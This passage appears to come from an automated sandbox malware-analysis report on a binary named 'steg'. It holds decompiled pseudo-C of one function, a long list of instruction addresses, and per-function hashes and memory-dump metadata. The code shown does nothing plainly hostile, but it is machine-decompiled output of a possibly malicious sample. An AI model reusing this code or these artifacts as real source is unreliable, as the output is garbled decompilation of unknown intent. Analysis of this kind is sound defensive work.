									if(_t539 == 0) {
										 *((intOrPtr*)(_t507 + 0x14)) = 0xffffffff;
									} else {
										_t489 = _a4;
										 *((intOrPtr*)(_t507 + 0x14)) =  *((intOrPtr*)(_t489 + 0x44));
										 *((intOrPtr*)(_t489 + 0x44)) =  *((intOrPtr*)(_t489 + 0x44)) + 1;
									}
									_t487 = 0;
									_t508 =  *_v32;
									__eflags = _t508;
									if(_t508 <= 0) {
										L59:
										asm("xorps xmm0, xmm0");
										asm("movlpd [ebp-0x48], xmm0");
										_t509 = _v72;
										_t416 = _v76;
									} else {
										_t545 =  *(_t454 + 0x20 + (_v60 * 8 - _v60) * 8);
										_t439 =  &(_v32[1]);
										__eflags = _t439;
										while(1) {
											__eflags =  *_t439 - _t545;
											if( *_t439 == _t545) {
												break;
											}
											_t487 = _t487 + 1;
											_t439 = _t439 + 4;
											__eflags = _t487 - _t508;
											if(_t487 < _t508) {
												continue;
											} else {
												goto L59;
											}
											goto L60;
										}
										asm("bts eax, ecx");
										__eflags = _t487 - 0x20;
										_t513 =  >=  ? 0 : 0;
										_t416 = 0 ^ _t513;
										__eflags = _t487 - 0x40;
										_t509 =  >=  ? _t416 : _t513;
									}
									L60:
									_t467 = _v56;
									_v36 = _v36 &  !_t509;
									_t511 = _v60;
									_v68 = _v68 &  !_t416;
									 *(_t467 + 0x28) = _t511;
									_t420 =  *(_t454 + 0x3c + (_t511 * 8 - _t511) * 8);
									__eflags = _t420;
									if(_t420 == 0) {
										L62:
										_v56 = _t467 + 0x40;
										_t467 =  *_t454;
										_t422 = _v52 + 1;
										_v52 = _t422;
										__eflags = _t422 - _t467;
										if(_t422 >= _t467) {
											_t502 = _v16;
											_t526 = _v20;
											goto L68;
										} else {
											_t545 = _v24;
											continue;
										}
									} else {
										__eflags = _t539;
										if(_t539 == 0) {
											E00FC0607(_a4, 0x478c88,  *_t420);
											_t526 = _v20;
											_t566 = _t566 + 0xc;
											goto L66;
										} else {
											goto L62;
										}
									}
									goto L137;
								}
							}
						}
					}
				} else {
					E00FC0607(_t466, 0x478c6c, 0x40);
					return 0;
				}
				L137:
			}


































































































































                                                                                                                    0x00fdfd97
                                                                                                                    0x00fdfda0
                                                                                                                    0x00fdfda7
                                                                                                                    0x00fdfdaa
                                                                                                                    0x00fdfdad
                                                                                                                    0x00fdfdb4
                                                                                                                    0x00fdfdcd
                                                                                                                    0x00fdfdda
                                                                                                                    0x00fdfddd
                                                                                                                    0x00fdfde0
                                                                                                                    0x00fdfde0
                                                                                                                    0x00fdfded
                                                                                                                    0x00fdfdef
                                                                                                                    0x00fdfdf2
                                                                                                                    0x00fdfdf5
                                                                                                                    0x00fdfdf7
                                                                                                                    0x00fdfdfd
                                                                                                                    0x00fdfe02
                                                                                                                    0x00fdfe05
                                                                                                                    0x00fdfe05
                                                                                                                    0x00fdfe08
                                                                                                                    0x00fdfe0b
                                                                                                                    0x00fdfe0f
                                                                                                                    0x00fe0235
                                                                                                                    0x00fe0239
                                                                                                                    0x00fe0241
                                                                                                                    0x00fe0249
                                                                                                                    0x00fdfe15
                                                                                                                    0x00fdfe1e
                                                                                                                    0x00fdfe21
                                                                                                                    0x00fdfe23
                                                                                                                    0x00fdfe26
                                                                                                                    0x00fdfe2b
                                                                                                                    0x00fdfe33
                                                                                                                    0x00fdfe36
                                                                                                                    0x00fdfe3c
                                                                                                                    0x00fdfe3c
                                                                                                                    0x00fdfe45
                                                                                                                    0x00fdfe48
                                                                                                                    0x00fdfe4b
                                                                                                                    0x00fdfe4f
                                                                                                                    0x00fdfe52
                                                                                                                    0x00fdfe57
                                                                                                                    0x00fdfe5a
                                                                                                                    0x00fdfe5d
                                                                                                                    0x00fdfe60
                                                                                                                    0x00fdfe63
                                                                                                                    0x00fdfe6b
                                                                                                                    0x00fdfe6d
                                                                                                                    0x00fdfe74
                                                                                                                    0x00fdfe7b
                                                                                                                    0x00fdfe82
                                                                                                                    0x00fdfe89
                                                                                                                    0x00fdfe90
                                                                                                                    0x00fdfe97
                                                                                                                    0x00fdfe9a
                                                                                                                    0x00fdfea3
                                                                                                                    0x00fdfea8
                                                                                                                    0x00fdfeab
                                                                                                                    0x00fdfead
                                                                                                                    0x00fdfeaf
                                                                                                                    0x00fdfeb3
                                                                                                                    0x00fdfec2
                                                                                                                    0x00fdfec5
                                                                                                                    0x00fdfecf
                                                                                                                    0x00fdfed4
                                                                                                                    0x00fdfeb5
                                                                                                                    0x00fdfeb6
                                                                                                                    0x00fdfebb
                                                                                                                    0x00fdfebe
                                                                                                                    0x00fdfec0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fdfec0
                                                                                                                    0x00fdfeb3
                                                                                                                    0x00fdfed9
                                                                                                                    0x00fdfedb
                                                                                                                    0x00fdfede
                                                                                                                    0x00fdfee0
                                                                                                                    0x00fdfee3
                                                                                                                    0x00fdfee7
                                                                                                                    0x00fdfee7
                                                                                                                    0x00fdfeec
                                                                                                                    0x00fdfef0
                                                                                                                    0x00fdfef2
                                                                                                                    0x00fdfef4
                                                                                                                    0x00fdfef6
                                                                                                                    0x00fdfef8
                                                                                                                    0x00fdfefc
                                                                                                                    0x00fdff00
                                                                                                                    0x00fdff02
                                                                                                                    0x00fdff07
                                                                                                                    0x00fdff0a
                                                                                                                    0x00fdff0d
                                                                                                                    0x00fdff0f
                                                                                                                    0x00fdff12
                                                                                                                    0x00fdff15
                                                                                                                    0x00fdff18
                                                                                                                    0x00fdff1b
                                                                                                                    0x00fdff1b
                                                                                                                    0x00fdff1b
                                                                                                                    0x00fdff1e
                                                                                                                    0x00fdff1e
                                                                                                                    0x00fdfefc
                                                                                                                    0x00fdff24
                                                                                                                    0x00fdff25
                                                                                                                    0x00fdff28
                                                                                                                    0x00fdff28
                                                                                                                    0x00fdff2c
                                                                                                                    0x00fdff2c
                                                                                                                    0x00fdff32
                                                                                                                    0x00fdff32
                                                                                                                    0x00fdff33
                                                                                                                    0x00fdff3a
                                                                                                                    0x00fdff3f
                                                                                                                    0x00fdff42
                                                                                                                    0x00fdff42
                                                                                                                    0x00fdff42
                                                                                                                    0x00fdff45
                                                                                                                    0x00fdff48
                                                                                                                    0x00fdff4c
                                                                                                                    0x00000000
                                                                                                                    0x00fdff52
                                                                                                                    0x00fdff52
                                                                                                                    0x00fdff58
                                                                                                                    0x00fdff5a
                                                                                                                    0x00fdff5d
                                                                                                                    0x00fdff64
                                                                                                                    0x00fdff6b
                                                                                                                    0x00fdff72
                                                                                                                    0x00fdff75
                                                                                                                    0x00fdff78
                                                                                                                    0x00fdff7b
                                                                                                                    0x00fdff7e
                                                                                                                    0x00fdff80
                                                                                                                    0x00fe0250
                                                                                                                    0x00fe0250
                                                                                                                    0x00fe0253
                                                                                                                    0x00fe0257
                                                                                                                    0x00000000
                                                                                                                    0x00fe0259
                                                                                                                    0x00fe0259
                                                                                                                    0x00fe025d
                                                                                                                    0x00000000
                                                                                                                    0x00fe025f
                                                                                                                    0x00fe0262
                                                                                                                    0x00fe0262
                                                                                                                    0x00fe0268
                                                                                                                    0x00fe026b
                                                                                                                    0x00fe026d
                                                                                                                    0x00fe0270
                                                                                                                    0x00fe0272
                                                                                                                    0x00fe0274
                                                                                                                    0x00fe0274
                                                                                                                    0x00fe027a
                                                                                                                    0x00fe027a
                                                                                                                    0x00fe027d
                                                                                                                    0x00fe0281
                                                                                                                    0x00fe0283
                                                                                                                    0x00fe0285
                                                                                                                    0x00fe028a
                                                                                                                    0x00fe028e
                                                                                                                    0x00fe028e
                                                                                                                    0x00fe028e
                                                                                                                    0x00fe0285
                                                                                                                    0x00fe0294
                                                                                                                    0x00fe0297
                                                                                                                    0x00fe0299
                                                                                                                    0x00fe02bf
                                                                                                                    0x00fe02bf
                                                                                                                    0x00fe02c6
                                                                                                                    0x00fe02cf
                                                                                                                    0x00fe02d4
                                                                                                                    0x00fe02d7
                                                                                                                    0x00fe02da
                                                                                                                    0x00fe02da
                                                                                                                    0x00fe02db
                                                                                                                    0x00fe02e1
                                                                                                                    0x00fe02e1
                                                                                                                    0x00fe029b
                                                                                                                    0x00fe02a2
                                                                                                                    0x00fe02a4
                                                                                                                    0x00fe02a7
                                                                                                                    0x00fe02aa
                                                                                                                    0x00fe02ad
                                                                                                                    0x00fe02af
                                                                                                                    0x00fe02b4
                                                                                                                    0x00fe02b9
                                                                                                                    0x00fe02bc
                                                                                                                    0x00000000
                                                                                                                    0x00fe02bc
                                                                                                                    0x00fe02af
                                                                                                                    0x00fe02e5
                                                                                                                    0x00fe02ec
                                                                                                                    0x00fe02ef
                                                                                                                    0x00fe02f7
                                                                                                                    0x00fe02f7
                                                                                                                    0x00fe02fe
                                                                                                                    0x00fe0312
                                                                                                                    0x00fe0323
                                                                                                                    0x00fe0325
                                                                                                                    0x00fe0329
                                                                                                                    0x00fe032c
                                                                                                                    0x00fe032f
                                                                                                                    0x00fe0331
                                                                                                                    0x00fe0333
                                                                                                                    0x00fe033c
                                                                                                                    0x00fe0341
                                                                                                                    0x00fe0344
                                                                                                                    0x00fe0344
                                                                                                                    0x00fe0346
                                                                                                                    0x00fe0349
                                                                                                                    0x00fe034b
                                                                                                                    0x00fe0350
                                                                                                                    0x00fe0369
                                                                                                                    0x00fe036e
                                                                                                                    0x00fe0382
                                                                                                                    0x00fe0387
                                                                                                                    0x00fe039b
                                                                                                                    0x00fe03a0
                                                                                                                    0x00fe03a2
                                                                                                                    0x00fe03a5
                                                                                                                    0x00fe03a8
                                                                                                                    0x00fe03b3
                                                                                                                    0x00fe03b8
                                                                                                                    0x00000000
                                                                                                                    0x00fe03b8
                                                                                                                    0x00fe0389
                                                                                                                    0x00fe0391
                                                                                                                    0x00fe0396
                                                                                                                    0x00000000
                                                                                                                    0x00fe0396
                                                                                                                    0x00fe0370
                                                                                                                    0x00fe0378
                                                                                                                    0x00fe037d
                                                                                                                    0x00000000
                                                                                                                    0x00fe037d
                                                                                                                    0x00fe0352
                                                                                                                    0x00fe0355
                                                                                                                    0x00fe035f
                                                                                                                    0x00fe0364
                                                                                                                    0x00fe03bb
                                                                                                                    0x00fe03bb
                                                                                                                    0x00fe03bb
                                                                                                                    0x00fe03bd
                                                                                                                    0x00fe03c3
                                                                                                                    0x00fe03cd
                                                                                                                    0x00fe03d2
                                                                                                                    0x00fe03d5
                                                                                                                    0x00fe03d5
                                                                                                                    0x00fe03d7
                                                                                                                    0x00fe03da
                                                                                                                    0x00fe03de
                                                                                                                    0x00fe03e1
                                                                                                                    0x00fe03e4
                                                                                                                    0x00fe03fd
                                                                                                                    0x00fe03fd
                                                                                                                    0x00fe03fd
                                                                                                                    0x00fe03fd
                                                                                                                    0x00fe0400
                                                                                                                    0x00fe0406
                                                                                                                    0x00fe0409
                                                                                                                    0x00fe040f
                                                                                                                    0x00fe0414
                                                                                                                    0x00fe0418
                                                                                                                    0x00fe041c
                                                                                                                    0x00fe0424
                                                                                                                    0x00fe042c
                                                                                                                    0x00fe042f
                                                                                                                    0x00fe03e6
                                                                                                                    0x00fe03e7
                                                                                                                    0x00fe03ec
                                                                                                                    0x00fe03ef
                                                                                                                    0x00fe03f1
                                                                                                                    0x00fe03f4
                                                                                                                    0x00000000
                                                                                                                    0x00fe03f6
                                                                                                                    0x00fe03f6
                                                                                                                    0x00fe03f6
                                                                                                                    0x00fe03f4
                                                                                                                    0x00fe0433
                                                                                                                    0x00fe0436
                                                                                                                    0x00fe0438
                                                                                                                    0x00fe043a
                                                                                                                    0x00fe0482
                                                                                                                    0x00fe0486
                                                                                                                    0x00fe048b
                                                                                                                    0x00fe043c
                                                                                                                    0x00fe043c
                                                                                                                    0x00fe0440
                                                                                                                    0x00000000
                                                                                                                    0x00fe0442
                                                                                                                    0x00fe0442
                                                                                                                    0x00fe0444
                                                                                                                    0x00fe0449
                                                                                                                    0x00fe0449
                                                                                                                    0x00fe0449
                                                                                                                    0x00fe044a
                                                                                                                    0x00fe0458
                                                                                                                    0x00fe045d
                                                                                                                    0x00fe0460
                                                                                                                    0x00fe0468
                                                                                                                    0x00fe046a
                                                                                                                    0x00fe0477
                                                                                                                    0x00fe047b
                                                                                                                    0x00fe046c
                                                                                                                    0x00fe046c
                                                                                                                    0x00fe0470
                                                                                                                    0x00fe0470
                                                                                                                    0x00fe046a
                                                                                                                    0x00fe0440
                                                                                                                    0x00fe043a
                                                                                                                    0x00fe0491
                                                                                                                    0x00fe0498
                                                                                                                    0x00fe04a4
                                                                                                                    0x00fe04a9
                                                                                                                    0x00fe04ad
                                                                                                                    0x00fe04af
                                                                                                                    0x00fe04b2
                                                                                                                    0x00fe04b4
                                                                                                                    0x00fe04b6
                                                                                                                    0x00fe04b9
                                                                                                                    0x00fe04bb
                                                                                                                    0x00fe04bd
                                                                                                                    0x00fe04c2
                                                                                                                    0x00fe04c2
                                                                                                                    0x00fe04c7
                                                                                                                    0x00fe04c7
                                                                                                                    0x00fe04c9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe04cb
                                                                                                                    0x00fe04cc
                                                                                                                    0x00fe04cf
                                                                                                                    0x00fe04d1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe04d1
                                                                                                                    0x00fe04c7
                                                                                                                    0x00fe04d3
                                                                                                                    0x00fe04d3
                                                                                                                    0x00fe04d3
                                                                                                                    0x00fe04d6
                                                                                                                    0x00fe04da
                                                                                                                    0x00fe05e7
                                                                                                                    0x00fe05e7
                                                                                                                    0x00fe04e0
                                                                                                                    0x00fe04e0
                                                                                                                    0x00fe04e4
                                                                                                                    0x00000000
                                                                                                                    0x00fe04ea
                                                                                                                    0x00fe04ed
                                                                                                                    0x00fe04ef
                                                                                                                    0x00fe04f4
                                                                                                                    0x00fe0515
                                                                                                                    0x00fe051a
                                                                                                                    0x00fe058d
                                                                                                                    0x00fe0599
                                                                                                                    0x00fe059e
                                                                                                                    0x00fe051c
                                                                                                                    0x00fe051c
                                                                                                                    0x00fe0520
                                                                                                                    0x00000000
                                                                                                                    0x00fe0522
                                                                                                                    0x00fe052a
                                                                                                                    0x00fe052e
                                                                                                                    0x00fe0533
                                                                                                                    0x00fe0540
                                                                                                                    0x00fe0545
                                                                                                                    0x00fe0548
                                                                                                                    0x00fe054b
                                                                                                                    0x00fe054f
                                                                                                                    0x00fe0551
                                                                                                                    0x00fe0555
                                                                                                                    0x00fe0557
                                                                                                                    0x00fe055a
                                                                                                                    0x00fe055c
                                                                                                                    0x00fe0560
                                                                                                                    0x00fe0566
                                                                                                                    0x00fe0568
                                                                                                                    0x00fe056a
                                                                                                                    0x00fe056e
                                                                                                                    0x00fe0572
                                                                                                                    0x00fe0573
                                                                                                                    0x00fe0573
                                                                                                                    0x00fe0583
                                                                                                                    0x00fe0588
                                                                                                                    0x00fe0588
                                                                                                                    0x00fe0555
                                                                                                                    0x00fe054f
                                                                                                                    0x00fe0520
                                                                                                                    0x00fe04f6
                                                                                                                    0x00fe0508
                                                                                                                    0x00fe050d
                                                                                                                    0x00fe050d
                                                                                                                    0x00fe05a8
                                                                                                                    0x00fe05ab
                                                                                                                    0x00fe05b1
                                                                                                                    0x00fe05b4
                                                                                                                    0x00fe05d1
                                                                                                                    0x00fe05d6
                                                                                                                    0x00fe05d6
                                                                                                                    0x00fe05dd
                                                                                                                    0x00fe05e2
                                                                                                                    0x00fe05e2
                                                                                                                    0x00fe04e4
                                                                                                                    0x00fe05ed
                                                                                                                    0x00fe05f3
                                                                                                                    0x00fe05f6
                                                                                                                    0x00fe05f9
                                                                                                                    0x00fe05fd
                                                                                                                    0x00fe05ff
                                                                                                                    0x00fe0602
                                                                                                                    0x00fe0602
                                                                                                                    0x00fe02f7
                                                                                                                    0x00fe060e
                                                                                                                    0x00fe0611
                                                                                                                    0x00fe0614
                                                                                                                    0x00fe0619
                                                                                                                    0x00fe061c
                                                                                                                    0x00fe061f
                                                                                                                    0x00fe0621
                                                                                                                    0x00fe0624
                                                                                                                    0x00fe0626
                                                                                                                    0x00fe0629
                                                                                                                    0x00fe0630
                                                                                                                    0x00fe063a
                                                                                                                    0x00fe063b
                                                                                                                    0x00fe0641
                                                                                                                    0x00fe0647
                                                                                                                    0x00fe0649
                                                                                                                    0x00fe064c
                                                                                                                    0x00fe064c
                                                                                                                    0x00fe0629
                                                                                                                    0x00fe0659
                                                                                                                    0x00fe0659
                                                                                                                    0x00fe025d
                                                                                                                    0x00000000
                                                                                                                    0x00fdff87
                                                                                                                    0x00fdff87
                                                                                                                    0x00fdff98
                                                                                                                    0x00fdff9c
                                                                                                                    0x00fdff9e
                                                                                                                    0x00fdffa5
                                                                                                                    0x00fdffa8
                                                                                                                    0x00fdffad
                                                                                                                    0x00fdffb5
                                                                                                                    0x00fdffba
                                                                                                                    0x00fdffbf
                                                                                                                    0x00fdffc4
                                                                                                                    0x00fdffc9
                                                                                                                    0x00fdffcc
                                                                                                                    0x00fdffcf
                                                                                                                    0x00fdffd1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fdffe2
                                                                                                                    0x00fdffe2
                                                                                                                    0x00fdffe4
                                                                                                                    0x00fdffe7
                                                                                                                    0x00fdffe7
                                                                                                                    0x00fdfff0
                                                                                                                    0x00fdfff3
                                                                                                                    0x00fdfff5
                                                                                                                    0x00fdffff
                                                                                                                    0x00fdffff
                                                                                                                    0x00fe0002
                                                                                                                    0x00fe0004
                                                                                                                    0x00fe0006
                                                                                                                    0x00fe0008
                                                                                                                    0x00fe0023
                                                                                                                    0x00fe0023
                                                                                                                    0x00fe0026
                                                                                                                    0x00fe002b
                                                                                                                    0x00fe002e
                                                                                                                    0x00fe000a
                                                                                                                    0x00fe000a
                                                                                                                    0x00fe000d
                                                                                                                    0x00fe000d
                                                                                                                    0x00fe0017
                                                                                                                    0x00fe0017
                                                                                                                    0x00fe0019
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe001b
                                                                                                                    0x00fe001c
                                                                                                                    0x00fe001f
                                                                                                                    0x00fe0021
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe0021
                                                                                                                    0x00fe0056
                                                                                                                    0x00fe005b
                                                                                                                    0x00fe005e
                                                                                                                    0x00fe0061
                                                                                                                    0x00fe0063
                                                                                                                    0x00fe0066
                                                                                                                    0x00fe0066
                                                                                                                    0x00fe0031
                                                                                                                    0x00fe0031
                                                                                                                    0x00fe0039
                                                                                                                    0x00fe003b
                                                                                                                    0x00fe006b
                                                                                                                    0x00fe006f
                                                                                                                    0x00fe007c
                                                                                                                    0x00fe007c
                                                                                                                    0x00fe007c
                                                                                                                    0x00fe0071
                                                                                                                    0x00fe0071
                                                                                                                    0x00fe0074
                                                                                                                    0x00fe0076
                                                                                                                    0x00000000
                                                                                                                    0x00fe0078
                                                                                                                    0x00fe0078
                                                                                                                    0x00fe0078
                                                                                                                    0x00fe0076
                                                                                                                    0x00fe007e
                                                                                                                    0x00fe0081
                                                                                                                    0x00fe008b
                                                                                                                    0x00fe00b4
                                                                                                                    0x00fe00b9
                                                                                                                    0x00fe008d
                                                                                                                    0x00fe009d
                                                                                                                    0x00fe00a2
                                                                                                                    0x00fe00a2
                                                                                                                    0x00fe00bf
                                                                                                                    0x00fe00c7
                                                                                                                    0x00fe00c9
                                                                                                                    0x00fe00d6
                                                                                                                    0x00fe00d6
                                                                                                                    0x00fe00de
                                                                                                                    0x00fe00e6
                                                                                                                    0x00fe00e9
                                                                                                                    0x00fe00ee
                                                                                                                    0x00fe00f6
                                                                                                                    0x00fe00fd
                                                                                                                    0x00fe0102
                                                                                                                    0x00fe010a
                                                                                                                    0x00fe010f
                                                                                                                    0x00fe0114
                                                                                                                    0x00fe00cb
                                                                                                                    0x00fe00cb
                                                                                                                    0x00fe00d0
                                                                                                                    0x00fe00d4
                                                                                                                    0x00fe0119
                                                                                                                    0x00fe011e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe00d4
                                                                                                                    0x00fe0121
                                                                                                                    0x00fe0123
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe003d
                                                                                                                    0x00fe003d
                                                                                                                    0x00fe0040
                                                                                                                    0x00fe0043
                                                                                                                    0x00fe0045
                                                                                                                    0x00fe004c
                                                                                                                    0x00fe004c
                                                                                                                    0x00000000
                                                                                                                    0x00fe0045
                                                                                                                    0x00fdfff7
                                                                                                                    0x00fdfff7
                                                                                                                    0x00fdfff9
                                                                                                                    0x00fe0143
                                                                                                                    0x00fe0143
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fdfff9
                                                                                                                    0x00000000
                                                                                                                    0x00fe0125
                                                                                                                    0x00fe0125
                                                                                                                    0x00fe0128
                                                                                                                    0x00fe012f
                                                                                                                    0x00fe0130
                                                                                                                    0x00fe0133
                                                                                                                    0x00fe0136
                                                                                                                    0x00fe0138
                                                                                                                    0x00fe0138
                                                                                                                    0x00fe0146
                                                                                                                    0x00fe0146
                                                                                                                    0x00fe014c
                                                                                                                    0x00fe0152
                                                                                                                    0x00fe0157
                                                                                                                    0x00fe0157
                                                                                                                    0x00fe015d
                                                                                                                    0x00fe0160
                                                                                                                    0x00fe0166
                                                                                                                    0x00fe016a
                                                                                                                    0x00fe016d
                                                                                                                    0x00fe016d
                                                                                                                    0x00fe0173
                                                                                                                    0x00fe0183
                                                                                                                    0x00fe0175
                                                                                                                    0x00fe0175
                                                                                                                    0x00fe017b
                                                                                                                    0x00fe017e
                                                                                                                    0x00fe017e
                                                                                                                    0x00fe018d
                                                                                                                    0x00fe018f
                                                                                                                    0x00fe0191
                                                                                                                    0x00fe0193
                                                                                                                    0x00fe01b7
                                                                                                                    0x00fe01b7
                                                                                                                    0x00fe01ba
                                                                                                                    0x00fe01bf
                                                                                                                    0x00fe01c2
                                                                                                                    0x00fe0195
                                                                                                                    0x00fe01a1
                                                                                                                    0x00fe01a8
                                                                                                                    0x00fe01a8
                                                                                                                    0x00fe01ab
                                                                                                                    0x00fe01ab
                                                                                                                    0x00fe01ad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe01af
                                                                                                                    0x00fe01b0
                                                                                                                    0x00fe01b3
                                                                                                                    0x00fe01b5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe01b5
                                                                                                                    0x00fe020b
                                                                                                                    0x00fe0210
                                                                                                                    0x00fe0213
                                                                                                                    0x00fe0216
                                                                                                                    0x00fe0218
                                                                                                                    0x00fe021b
                                                                                                                    0x00fe021b
                                                                                                                    0x00fe01c5
                                                                                                                    0x00fe01c5
                                                                                                                    0x00fe01ca
                                                                                                                    0x00fe01cd
                                                                                                                    0x00fe01d2
                                                                                                                    0x00fe01de
                                                                                                                    0x00fe01e1
                                                                                                                    0x00fe01e5
                                                                                                                    0x00fe01e7
                                                                                                                    0x00fe01ed
                                                                                                                    0x00fe01f3
                                                                                                                    0x00fe01f6
                                                                                                                    0x00fe01f9
                                                                                                                    0x00fe01fa
                                                                                                                    0x00fe01fd
                                                                                                                    0x00fe01ff
                                                                                                                    0x00fe024a
                                                                                                                    0x00fe024d
                                                                                                                    0x00000000
                                                                                                                    0x00fe0201
                                                                                                                    0x00fe0201
                                                                                                                    0x00000000
                                                                                                                    0x00fe0201
                                                                                                                    0x00fe01e9
                                                                                                                    0x00fe01e9
                                                                                                                    0x00fe01eb
                                                                                                                    0x00fe022a
                                                                                                                    0x00fe022f
                                                                                                                    0x00fe0232
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fe01eb
                                                                                                                    0x00000000
                                                                                                                    0x00fe01e7
                                                                                                                    0x00fdff87
                                                                                                                    0x00fdff80
                                                                                                                    0x00fdff4c
                                                                                                                    0x00fdfdb6
                                                                                                                    0x00fdfdbe
                                                                                                                    0x00fdfdcc
                                                                                                                    0x00fdfdcc
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2102423945-2766056989
                                                                                                                    • Opcode ID: f11dd26641e8099b48007b7a11ac73a181dc809e26a8580c0df3d4b6243395f2
                                                                                                                    • Instruction ID: d47535f2cd5a92ce5b6d2cd238fc02213da7e1f748dc0608621391f2998e1daf
                                                                                                                    • Opcode Fuzzy Hash: f11dd26641e8099b48007b7a11ac73a181dc809e26a8580c0df3d4b6243395f2
                                                                                                                    • Instruction Fuzzy Hash: E352CF71E00259AFDB14CF59CC84FAEBBB1FF85320F288159E805AB251DB75E981DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F9B2E7 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 605COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gfff
                                                                                                                    • API String ID: 0-1553575800
                                                                                                                    • Opcode ID: 625dd91239eeb31d5e8afd7e9e6da8aa7ddfff1a3e6500eb4005a9946fb9c331
                                                                                                                    • Instruction ID: 1a8548ee03a1c0e9c64a69f0ceb7dee07c6d984498cbd35f26edeae9c431eaf7
                                                                                                                    • Opcode Fuzzy Hash: 625dd91239eeb31d5e8afd7e9e6da8aa7ddfff1a3e6500eb4005a9946fb9c331
                                                                                                                    • Instruction Fuzzy Hash: 38222971D002258FDF15DFA8D981AAEBBF4AF48310F1941A9ED45AB301E339ED01DBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FD2C77 Relevance: 3.9, APIs: 1, Instructions: 2404COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 207502321f6e312850739607eb2b7c0180b4b0bc002681cabc915aa88fc9500a
                                                                                                                    • Instruction ID: 238362c5147847b178d4232eba0780682b1c199f798f5acc5898b4eb96963a22
                                                                                                                    • Opcode Fuzzy Hash: 207502321f6e312850739607eb2b7c0180b4b0bc002681cabc915aa88fc9500a
                                                                                                                    • Instruction Fuzzy Hash: 7F33B970900645CFDB20EF58C880F6ABBB2FF44314F1A81AED9469B352D736EA15DB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F93EC7 Relevance: 3.9, APIs: 2, Instructions: 873COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ef3aae719454a8bd9bfeeb4a6cdba7047f76a21da3795b89c417afb23a1249f
                                                                                                                    • Instruction ID: e8c826c4cc68ffff74f778fa57b8018d7b80de94d2fd1a5ab0607996c6bb9da6
                                                                                                                    • Opcode Fuzzy Hash: 4ef3aae719454a8bd9bfeeb4a6cdba7047f76a21da3795b89c417afb23a1249f
                                                                                                                    • Instruction Fuzzy Hash: B772E170E00241DFEF24DF24C885FAAB7B4BF24314F18856AE91AA7211D735F952EB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 010798D1 Relevance: 3.5, APIs: 2, Instructions: 537COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
